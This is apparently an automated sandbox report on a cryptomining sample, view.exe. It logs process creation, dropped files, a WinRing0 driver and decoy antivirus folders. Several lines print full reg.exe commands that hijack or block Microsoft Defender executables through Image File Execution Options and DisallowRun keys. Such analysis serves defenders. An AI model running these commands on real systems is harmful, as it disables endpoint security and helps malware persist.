                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCncProxy.exe' /v Defender2 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsSense.exe' /v Defender1 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender5 /t REG_SZ /d 'SenseSampleUploader.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender3 /t REG_SZ /d 'SenseIR.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender7 /t REG_SZ /d 'ConfigSecurityPolicy.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender9 /t REG_SZ /d 'MsMpEng.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\view.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                        Source: C:\Users\user\Desktop\view.exeFile created: C:\Users\Public\Public.cmdJump to behavior
                        Source: C:\Users\user\Desktop\view.exeFile created: C:\Users\user\AppData\Local\Temp\Internet Explorer.zipJump to behavior
                        Source: WinRing0x64.sysBinary string: \Device\WinRing0_1_2_0
                        Source: classification engineClassification label: mal100.evad.mine.winEXE@975/20@2/1
                        Source: C:\Users\user\Desktop\view.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\view.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\ProgramData\screen.exeCode function: 8_2_0040E395 CreateToolhelp32Snapshot,memset,Process32First,OpenProcess,memset,GetModuleHandleA,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32Next,CloseHandle,
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2296:120:WilError_01
                        Source: C:\Users\user\Desktop\view.exeCode function: 0_2_00412898 FindResourceA,SizeofResource,LoadResource,LockResource,FreeResource,
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Program Files\BitdefenderJump to behavior
                        Source: RtkAudio.exeString found in binary or memory: id-cmc-addExtensions
                        Source: RtkAudio.exeString found in binary or memory: set-addPolicy
                        Source: RtkAudio.exeString found in binary or memory: if(p-start_p>size_limit)
                        Source: RtkAudio.exeString found in binary or memory: -h, --help display this help and exit
                        Source: RtkAudio.exeString found in binary or memory: -h, --help display this help and exit
                        Source: RtkAudio.exeString found in binary or memory: --help
                        Source: RtkAudio.exeString found in binary or memory: --help
                        Source: RtkAudio.exeString found in binary or memory: --help--version--export-topology--print-platforms%s
                        Source: RtkAudio.exeString found in binary or memory: --help--version--export-topology--print-platforms%s
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: view.exeStatic file information: File size 24618496 > 1048576
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\BitdefenderJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\Bitdefender\Endpoint SecurityJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\ESTsoftJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\ESTsoft\ALYacJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\AhnLabJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\MalwarebytesJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\Malwarebytes\Anti-MalwareJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\Norton SecurityJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\Norton Security\EngineJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\Avast SoftwareJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\Alwil SoftwareJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\McAfee Security ScanJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\ESETJump to behavior
                        Source: view.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1764000
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys
                        Source: C:\ProgramData\screen.exeCode function: 8_2_00410C10 push eax; ret
                        Source: C:\ProgramData\screen.exeCode function: 8_2_00410C10 push eax; ret
                        Source: C:\ProgramData\screen.exeCode function: 8_2_00410BD5 push ecx; ret
                        Source: C:\Users\user\Desktop\view.exeCode function: 0_2_004133BC LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1

                        Persistence and Installation Behavior:

                        barindex
                        Uses cmd line tools excessively to alter registry or file data
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Users\user\Desktop\view.exeFile created: C:\ProgramData\screen.exeJump to dropped file
                        Source: C:\Users\user\Desktop\view.exeFile created: C:\ProgramData\screen.exeJump to dropped file
                        Source: C:\Users\user\Desktop\view.exeFile created: C:\Users\user\AppData\Local\Temp\unpro.exeJump to dropped file

                        Boot Survival:

                        barindex
                        Creates an undocumented autostart registry key
                        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsSense.exe Defender1Jump to behavior
                        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsSense.exe Defender1Jump to behavior
                        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCncProxy.exe Defender2Jump to behavior
                        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseIR.exe Defender3Jump to behavior
                        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseNdr.exe Defender4Jump to behavior
                        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseSampleUploader.exe Defender5Jump to behavior
                        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCE.exe Defender6Jump to behavior
                        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe Defender7Jump to behavior
                        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe Defender8Jump to behavior
